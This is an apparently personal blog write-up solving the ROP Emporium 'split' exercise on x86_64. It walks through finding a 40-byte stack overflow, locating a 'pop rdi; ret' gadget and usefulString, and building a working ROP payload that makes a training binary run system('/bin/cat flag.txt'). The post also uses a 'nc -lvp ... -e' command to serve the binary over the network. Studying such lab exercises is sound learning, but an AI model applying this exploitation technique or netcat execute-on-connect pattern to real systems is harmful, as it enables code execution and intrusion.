ropemporium: split and callme writeup

Jan 21, 2024 security rop

It sounds kinda weird when you say it like that..

This is going to be an analysis of the ROP Emporium split puzzle solution along with callme, for the x86_64 platform. I prefer to rely mostly on unix tools you’d find available on any box, simply because they’re the most re-usable for any other work you do. Presumably you have other reasons to be analyzing ELF binaries? Either way, it doesn’t matter, read on.

By the way this post will be a SPOILER so don’t read it unless you want that. Maybe give it a try first! Or don’t, none of my business.

intro

A quick introduction to the site: ROP Emporium provides a binary and a flag file, and your goal is to run the binary with an input such that it prints out the contents of the flag file. It’s obviously built like a program that’s not meant to do that, but the binary is structured in such a way that it contains the gadgets necessary to print out that file.

Each challenge requires you to analyze the binary and redirect execution by precisely manipulating the stack entries.

There are other hints provided, for example: you’re on a website called ROP Emporium and you already know the class of vulnerability you’re looking for. Also they conveniently mention the instruction pointer can be overwritten by a buffer overflow consisting of 40 bytes.

buffer overflow

Let’s say you didn’t know that though. Clear the kernel ring buffer:

sudo dmesg -C

and start feeding in different lengths of strings. Once you get to 40, you’ll see a segfault.

BOF=$(perl -E 'say "X" x 40')
echo "${BOF}" | ./split
split by ROP Emporium
x86_64

Contriving a reason to ask user for data...
> Thank you!
[1]    6850 done                                        echo "${BOF}" |
       6851 illegal hardware instruction (core dumped)  ./split

dmesg now shows you

$ sudo dmesg -t
traps: split[6851] trap invalid opcode ip:40060f sp:7ffee0498f60 error:0 in split[400000+1000]

but if you add for instance, 5 ‘A’s on to the end, you’ll see we are beginning to overwrite the instruction pointer:

echo "${BOF}AAAAA" | ./split
...
sudo dmesg -t
split[6875]: segfault at a4141414141 ip 00000a4141414141 sp 00007ffdff9f12a0 error 14 likely on CPU 1 (core 1, socket 0)
Code: Unable to access opcode bytes at 0xa4141414117.

See all those 41s? Verify on asciitable.com that 0x41 is “A”.

Also verify that you get the exact same results if you encode the ascii characters yourself with the hexadecimal representation of that same string:

echo "${BOF}\x41\x41\x41\x41\x41" | ./split

little endian

We know something more meaningful will have to go there, but before we figure out what that is, let’s explore how we would write it there if we did know it. Instead of all 41s, let’s put in 0x41 - 0x45 to see how it shows up in dmesg.

echo "${BOF}\x41\x42\x43\x44\x45" | ../split/split
sudo dmesg -t
split[7815]: segfault at a4544434241 ip 00000a4544434241 sp 00007ffc83aa4580 error 14 likely on CPU 4 (core 4, socket 0)
Code: Unable to access opcode bytes at 0xa4544434217.

So our input was 41 42 43 44 45 and the CPU sees 45 44 43 42 41, it’s been reversed into little-endian byte order.

Tip

Little-endian just means that when you have a representation of a number and you start reading it from left-to-right (normally, same way we pronounce numbers in decimal), which side of the number do you see first? In the representation "1024" we read "one thousand" first, and "four" last, so that would be big-endian. In little-endian, you read the small end first.

Put a pin in that for now while we figure out what needs to go there.

analyzing the split binary

The first thing we can do is look for interesting function names. I like to use the nm tool to list symbols. If we grep for the symbols labeled with a ’t’, we get function names which reside in the “text” portion of the binary.

nm split | grep ' t'
00000000004005f0 t deregister_tm_clones
0000000000400660 t __do_global_dtors_aux
0000000000400690 t frame_dummy
00000000004006e8 t pwnme
0000000000400620 t register_tm_clones
0000000000400742 t usefulFunction

usefulFunction sounds useful.

You can also see that there’s a usefulString by searching the data section:

nm split | grep ' D'
0000000000601050 D __data_start
0000000000601058 D __dso_handle
0000000000601072 D _edata
0000000000601078 D __TMC_END__
0000000000601060 D usefulString

What’s happening within usefulFunction? We can use gdb to figure that out. Use the disass command to disassemble the function we’re curious about:

gdb -q split
(No debugging symbols found in split)
(gdb) disass usefulFunction
Dump of assembler code for function usefulFunction:
   0x0000000000400742 <+0>:	push   rbp
   0x0000000000400743 <+1>:	mov    rbp,rsp
   0x0000000000400746 <+4>:	mov    edi,0x40084a
   0x000000000040074b <+9>:	call   0x400560 <system@plt>
   0x0000000000400750 <+14>:	nop
   0x0000000000400751 <+15>:	pop    rbp
   0x0000000000400752 <+16>:	ret
End of assembler dump.

Or get the same info with objdump:

objdump -D split
[SNIP]
0000000000400742 <usefulFunction>:
  400742:	55                   	push   %rbp
  400743:	48 89 e5             	mov    %rsp,%rbp
  400746:	bf 4a 08 40 00       	mov    $0x40084a,%edi
  40074b:	e8 10 fe ff ff       	call   400560 <system@plt>
  400750:	90                   	nop
  400751:	5d                   	pop    %rbp
  400752:	c3                   	ret
  400753:	66 2e 0f 1f 84 00 00 	cs nopw 0x0(%rax,%rax,1)
  40075a:	00 00 00
  40075d:	0f 1f 00             	nopl   (%rax)
[/SNIP]

So system is being called with something, and the call is landing in the PLT (procedure linkage table). This is a lookup table the ELF format uses to enable lazy binding of external calls, and since we know the virtual address of the stub that ends up there we don’t need to go too deep in understanding exactly how it works.

what’s it being called with? In x64, the rdi register holds the argument to system (on our system it’s called edi but it’s the same). gdb can also tell us what’s being loaded into that register in the line right above the system call with the x/s or “examine as string” command:

(gdb) x/s 0x40084a
0x40084a:	"/bin/ls"

Okay! So usefulFunction is calling system("/bin/ls"). What we need to do is execute this line but with a different string in the rdi register. Maybe one that prints the flag.txt file?

Remember we already saw a usefulString in the data section, what’s in that? gdb can tell us that too in the same way.

(gdb) x/s 0x601060
0x601060 <usefulString>:	"/bin/cat flag.txt"

Perfect!

ROP chain

So the goal is to execute the system call with the usefulString loaded into the rdi register instead of what the program is loading in. This is the perfect target for a ROP gadget.

If we could find a gadget which pops the next stack value into %rdi and returns,

pop rdi
ret

then we could load the address of that gadget into the stack (overwriting the instruction pointer), and put the address of /bin/cat flag.txt right after it, so it ends up in rdi. And then right after that, we’d put the address of the system call, so that the return would go there and execute system("/bin/cat flag.txt").

finding ROP gadgets

Here I must admit, I’m a bit of a fraud. Having already extolled the virtue and purity of using only builtin unix tools for our analysis, there are simply better toolsets when it comes to analyzing a binary for ROP gadgets.

So I wussed out and used Ropper which is a Python framework for disassembly and binary analysis. If anyone has better ideas please email me. Nevertheless, the mighty Snake provides:

ropper --file split | grep rdi
[INFO] Load gadgets from cache
[LOAD] loading... 100%
[LOAD] removing double gadgets... 100%
0x00000000004006d4: add byte ptr [rax], al; add byte ptr [rdi + 0x400806], bh; call 0x550; mov eax, 0; pop rbp; ret;
0x00000000004006d6: add byte ptr [rdi + 0x400806], bh; call 0x550; mov eax, 0; pop rbp; ret;
0x00000000004007c3: pop rdi; ret;

This last entry is exactly what we said we needed.

the plan

So we have a buffer overflow in main, and our ROP chain will need to:

Overwrite the return address with the address of the ROP gadget
The ROP gadget will take whatever’s next on the stack and place it in rdi and then
the ROP gadget will return using the next address in memory, which needs to be the system call.

The address of the system call is where usefulFunction looks up system@plt, and that address was found earlier.

payload

The payload will be <overflow string> + <gadget address> + <useful string address> + <system@plt call>

All stack frames need to align to 8 bytes, so 0x004007c3 is actually 0x00000000000407c3, so when you incorporate them into the payload, you need to pad with the zeros at the end.

Lookup the ascii characters if they are printable at https://asciitable.com. Some of them are. I like to set up a table to do all parts of the 64-bit address construction.

Structure	Address	Reversed bytes	Opcode
rop gadget	0x004007c3	c3 07 40	\xc3\x07@\x00\x00\x00\x00\x00
cat flag string	0x00601060	60 10 60	`\x10`\x00\x00\x00\x00\x00
system@plt call	0x0040074b	4b 07 40	K\x07@\x00\x00\x00\x00\x00

Now our final payload will be:

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\xc3\x07@\x00\x00\x00\x00\x00`\x10`\x00\x00\x00\x00\x00K\x07@\x00\x00\x00\x00\x00

Lets run it:

echo 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\xc3\x07@\x00\x00\x00\x00\x00`\x10`\x00\x00\x00\x00\x00K\x07@\x00\x00\x00\x00\x00' | ./split
split by ROP Emporium
x86_64

Contriving a reason to ask user for data...
> Thank you!
ROPE{a_placeholder_32byte_flag!}
split by ROP Emporium
x86_64

Contriving a reason to ask user for data...
> Thank you!

Exiting
[1]    33579 done                              echo  |
       33580 segmentation fault (core dumped)  ./split

We can also run our split executable over a connection!

nc -lvp 9999 -e ./split

and in another terminal

echo 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\xc3\x07@\x00\x00\x00\x00\x00`\x10`\x00\x00\x00\x00\x00K\x07@\x00\x00\x00\x00\x00' | nc localhost 9999
split by ROP Emporium
x86_64

Contriving a reason to ask user for data...
> Thank you!
ROPE{a_placeholder_32byte_flag!}
split by ROP Emporium
x86_64

Contriving a reason to ask user for data...